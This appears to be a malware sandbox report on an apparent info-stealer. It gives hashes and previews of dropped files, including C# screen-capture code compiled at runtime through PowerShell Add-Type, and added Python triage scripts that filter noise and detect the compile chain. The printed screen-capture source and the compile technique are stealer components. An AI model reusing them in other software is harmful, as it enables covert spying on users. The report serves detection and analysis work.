                                                                                                                                                                                                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26384
                                                                                                                                                                                                                                            Entropy (8bit):7.471075877103443
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
                                                                                                                                                                                                                                            MD5:FB70AECE725218D4CBA9BA9BBB779CCC
                                                                                                                                                                                                                                            SHA1:BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
                                                                                                                                                                                                                                            SHA-256:9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
                                                                                                                                                                                                                                            SHA-512:63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):659216
                                                                                                                                                                                                                                            Entropy (8bit):7.993010988331354
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
                                                                                                                                                                                                                                            MD5:21AEA45D065ECFA10AB8232F15AC78CF
                                                                                                                                                                                                                                            SHA1:6A754EB690FF3C7648DAE32E323B3B9589A07AF2
                                                                                                                                                                                                                                            SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
                                                                                                                                                                                                                                            SHA-512:D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):267024
                                                                                                                                                                                                                                            Entropy (8bit):7.9826656358602595
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
                                                                                                                                                                                                                                            MD5:B2712B0DD79A9DAFE60AA80265AA24C3
                                                                                                                                                                                                                                            SHA1:347E5AD4629AF4884959258E3893FDE92EB3C97E
                                                                                                                                                                                                                                            SHA-256:B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
                                                                                                                                                                                                                                            SHA-512:4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
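Entries with exactly these hashes recur once per PowerShell launch in the run, because PowerShell writes this AppLocker policy-probe file to the user's temp directory every time it starts; the hashes and the Preview text, not the number of repeats, are what identify it. The following Python is an added example and is not part of the Joe Sandbox report: it parses the dropped-file table in the key:value layout used on this page, groups entries by SHA-256, and marks this probe as a benign host artifact so it is not triaged as a malware drop. The sample text is constructed from the values shown above plus one clearly fake entry (the all-zero SHA-256 and C:\example\dropper.exe are placeholders, not anything from the report).

```python
from collections import OrderedDict

# Content of PowerShell's AppLocker policy-probe file, exactly as shown in
# the report's Preview column. PowerShell drops such a file at every
# start-up, so one entry appears per PowerShell process in the run.
APPLOCKER_PROBE = "# PowerShell test file to determine AppLocker lockdown mode"

# Constructed sample: three copies of the entry from the report (values
# copied from it) and one hypothetical, obviously fake drop to show grouping.
PS_ENTRY = r"""
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
"""
FAKE_ENTRY = r"""
Process:C:\example\dropper.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):12345
SHA-256:0000000000000000000000000000000000000000000000000000000000000000
Malicious:true
Reputation:unknown
Preview:MZ......
"""
SAMPLE = PS_ENTRY * 3 + FAKE_ENTRY


def parse_dropped_files(text):
    """Split a dropped-file table into one dict per entry.

    An entry starts at a 'Process:' line and takes every following
    'key:value' line up to the next 'Process:' line. The split is on the
    first colon only, so 'Process:C:\\...' keeps its drive letter.
    """
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        key = key.strip()
        if key == "Process":
            current = OrderedDict()
            entries.append(current)
        if current is not None:
            current[key] = value.strip()
    return entries


def group_by_sha256(entries):
    """Collapse entries with the same SHA-256; keep count and dropping processes."""
    groups = OrderedDict()
    for entry in entries:
        digest = entry.get("SHA-256", "").upper()
        group = groups.setdefault(digest, {"count": 0, "first": entry, "processes": set()})
        group["count"] += 1
        group["processes"].add(entry.get("Process", ""))
    return groups


def classify(entry):
    """Verdict for one entry: the PowerShell probe is benign start-up noise."""
    preview = entry.get("Preview", "")
    process = entry.get("Process", "").lower()
    if process.endswith("powershell.exe") and preview.startswith(APPLOCKER_PROBE):
        return "powershell-applocker-probe"
    if entry.get("Malicious", "").lower() == "true":
        return "flagged-malicious"
    return "review"


def triage(text):
    """One row per distinct SHA-256 with its repeat count and verdict."""
    rows = []
    for digest, group in group_by_sha256(parse_dropped_files(text)).items():
        rows.append({
            "sha256": digest,
            "count": group["count"],
            "verdict": classify(group["first"]),
            "processes": sorted(group["processes"]),
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["count"], row["verdict"], row["sha256"][:16], row["processes"])
```

triage(SAMPLE) returns one row per distinct SHA-256 with a repeat count; the probe collapses to a single row, and everything else keeps a "review" or "flagged-malicious" verdict. Malicious:false in the report is only the sandbox's per-file verdict, so the classifier treats it as a hint and not as a reason to skip an entry.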
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                                                                            Entropy (8bit):3.101546430152555
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxRak7YnqqyWPN5Dlq5J:+RI+ycuZhNLRakSyWPNnqX
                                                                                                                                                                                                                                            MD5:BA752A5FCA821CBCF5DD3246EDBE5DBC
                                                                                                                                                                                                                                            SHA1:4255BFBC99E50EC6D4E62A6DBFFA602D803C8357
                                                                                                                                                                                                                                            SHA-256:25DB2A690D1ED72E06BEF2114C9A637422BFAB881ADA4A267903C8A30D8BE285
                                                                                                                                                                                                                                            SHA-512:2A3F8D4798E7F76E1CBEC771F5F1EE189E2BAAB87EC1A7A892518E464C75189756C7BB25E7B75865F11FBF42105C6D79C29A1B2E0936E4082F68518161B4A871
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.g.m.u.p.5.d.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.g.m.u.p.5.d.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1004
                                                                                                                                                                                                                                            Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):607
                                                                                                                                                                                                                                            Entropy (8bit):5.3183786158253366
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfVYWZEifVV:V3ka6KOkqeFkOfzEifH
                                                                                                                                                                                                                                            MD5:822DB3FF250428786811115C9E2BE03C
                                                                                                                                                                                                                                            SHA1:8CF4EBEE47384B6194B417C2BC178794ABE9C4D1
                                                                                                                                                                                                                                            SHA-256:709DA68C368E585999EA8F1403DE20C414CE3396BA983A6D7C6FDCBDC97DEDD9
                                                                                                                                                                                                                                            SHA-512:C6AA23DDF82A18FE19FA0C77EDCABD4F7236AE420803B070282C8B866BC5A369B7AA76C1075BFBE4D1F21FC49E27D220E6A18835381304CE8488DC517D8F76DE
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.0.cs"
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                                                            Entropy (8bit):3.158720554758396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:6x7oEAtf0KhzBU/zf6mtJYN0RpW1ulLRa3yqq:LNz0GmwOxnK
                                                                                                                                                                                                                                            MD5:5573F8EB21DF323FA10495D5FCA8C20E
                                                                                                                                                                                                                                            SHA1:D959C1F23066B129BC1E88E3CA3D9843D0A6A221
                                                                                                                                                                                                                                            SHA-256:B7A9F45D2A1A771078C2435DB62E5043B69E5DD81FFA16F112E32F3FAF6FCAFD
                                                                                                                                                                                                                                            SHA-512:AE59E169703CF979DAD2DB9C346340F280DED6E472B9D946CBDEE85F3D4610D6F838EA1EDFD0FFECFCA299E50F0A9FB25997AC7F1DB1AF7C15E3EC7A7F908656
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.9g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
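The five records above (the `.res` file, the `.cs` source, the `.cmdline` response file, and the 4096-byte DLL, all under `C:\Users\user\AppData\Local\Temp\tgmup5d5\`) are the on-disk footprint of PowerShell's `Add-Type`: PowerShell writes `<random>.0.cs` and `<random>.cmdline` into a random `%TEMP%` subdirectory and spawns `csc.exe`, which produces the `.res` and the `.dll` with the same random name. The source here compiles a `Graphics.CopyFromScreen` helper against `System.Drawing` and `System.Windows.Forms`, i.e. screen capture. The repeated 60-byte "AppLocker lockdown mode" file, by contrast, is the `__PSScriptPolicyTest` probe that PowerShell itself writes on every start to test AppLocker/WDAC enforcement, and is noise an analyst should suppress. The following triage script is an added example, not Joe Sandbox code: it parses the flattened `key:value` records as they appear on this page (a constructed, abbreviated copy is embedded inline), suppresses the policy-probe file by size and MD5, and correlates the response file, source and DLL into one finding; the regex for the `%TEMP%\<8 random chars>\<same>.dll` layout is an assumption about the typical `Add-Type` naming, not a documented guarantee.

```python
import re

# Constructed sample: the dropped-file records from this report, reduced to the
# fields the triage uses; previews are abbreviated. Only the key:value line
# layout seen on this page is assumed.
SAMPLE = r"""
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
MD5:D17FE0A3F47BE24A6453E9EF58C94641
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1004
MD5:C76055A0388B713A1EABE16130684DC3
Malicious:false
Preview:.using System;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{ ... graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); ... }
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:dropped
Size (bytes):607
MD5:822DB3FF250428786811115C9E2BE03C
Malicious:true
Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.0.cs"
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):4096
MD5:5573F8EB21DF323FA10495D5FCA8C20E
Malicious:false
Preview:MZ......
"""

# PowerShell's own AppLocker/WDAC probe (__PSScriptPolicyTest_*.ps1/.psm1): benign noise.
PS_PROBE_MD5 = "D17FE0A3F47BE24A6453E9EF58C94641"
PS_PROBE_TEXT = "# PowerShell test file to determine AppLocker lockdown mode"

# Patterns over the csc.exe response file (.cmdline) preview.
OUT_RE = re.compile(r'/out:"([^"]+)"')
REF_RE = re.compile(r'/R:"([^"]+)"')
# Assumed typical Add-Type layout: %TEMP%\<8 random chars>\<same 8 chars>.dll
ADDTYPE_LAYOUT_RE = re.compile(r'\\AppData\\Local\\Temp\\([0-9a-z]{8})\\\1\.dll$', re.IGNORECASE)


def parse_records(text):
    """Split the flattened report into records; each runs from Process: to Preview:."""
    records, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if key == "Process" and cur:      # record without a Preview line: flush it
            records.append(cur)
            cur = {}
        cur[key] = value
        if key == "Preview":
            records.append(cur)
            cur = {}
    if cur:
        records.append(cur)
    return records


def is_powershell_policy_probe(rec):
    """True for the 60-byte file every PowerShell start drops to test AppLocker."""
    return (rec.get("Process", "").lower().endswith("powershell.exe")
            and rec.get("Size (bytes)") == "60"
            and rec.get("MD5", "").upper() == PS_PROBE_MD5
            and rec.get("Preview", "").startswith(PS_PROBE_TEXT))


def triage_add_type_compile(records):
    """Correlate the response file, the C# source and the csc.exe-built DLL."""
    f = {"out_path": None, "add_type_layout": False, "gui_refs": [],
         "screen_capture_source": False, "dll_dropped_by_csc": False}
    for rec in records:
        proc = rec.get("Process", "").lower()
        preview = rec.get("Preview", "")
        if proc.endswith("powershell.exe") and "/t:library" in preview and "/out:" in preview:
            m = OUT_RE.search(preview)
            if m:
                f["out_path"] = m.group(1)
                f["add_type_layout"] = bool(ADDTYPE_LAYOUT_RE.search(m.group(1)))
            # Referenced GUI assemblies hint at what the compiled helper can do.
            f["gui_refs"] = sorted({ref.rsplit("\\", 1)[-1] for ref in REF_RE.findall(preview)
                                    if "System.Drawing" in ref or "System.Windows.Forms" in ref})
        elif "CopyFromScreen" in preview and "System.Drawing" in preview:
            f["screen_capture_source"] = True
        elif proc.endswith("csc.exe") and rec.get("File Type", "").startswith("PE32") \
                and "(DLL)" in rec.get("File Type", ""):
            f["dll_dropped_by_csc"] = True
    complete = f["add_type_layout"] and f["screen_capture_source"] and f["dll_dropped_by_csc"]
    f["verdict"] = ("add-type-compiled screen-capture helper" if complete
                    else "no complete Add-Type compile chain")
    return f


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    kept = [r for r in recs if not is_powershell_policy_probe(r)]
    print(f"{len(recs)} records, {len(recs) - len(kept)} PowerShell policy probes suppressed")
    print(triage_add_type_compile(kept))
```

Note that the `Malicious` flag the sandbox assigns is per file, so the DLL itself is marked `false` while only the response file is marked `true`; correlating the three artifacts by the shared random name, as above, is what turns them into one detectable event (the Sigma rule "Dot net compiler compiles file from suspicious location" listed in this report fires on the same `csc.exe` `/out:` path under `%TEMP%`).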
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):1149
                                                                                                                                                                                                                                            Entropy (8bit):5.494287227791722
                                                                                                                                                                                                                                            Encrypted:false
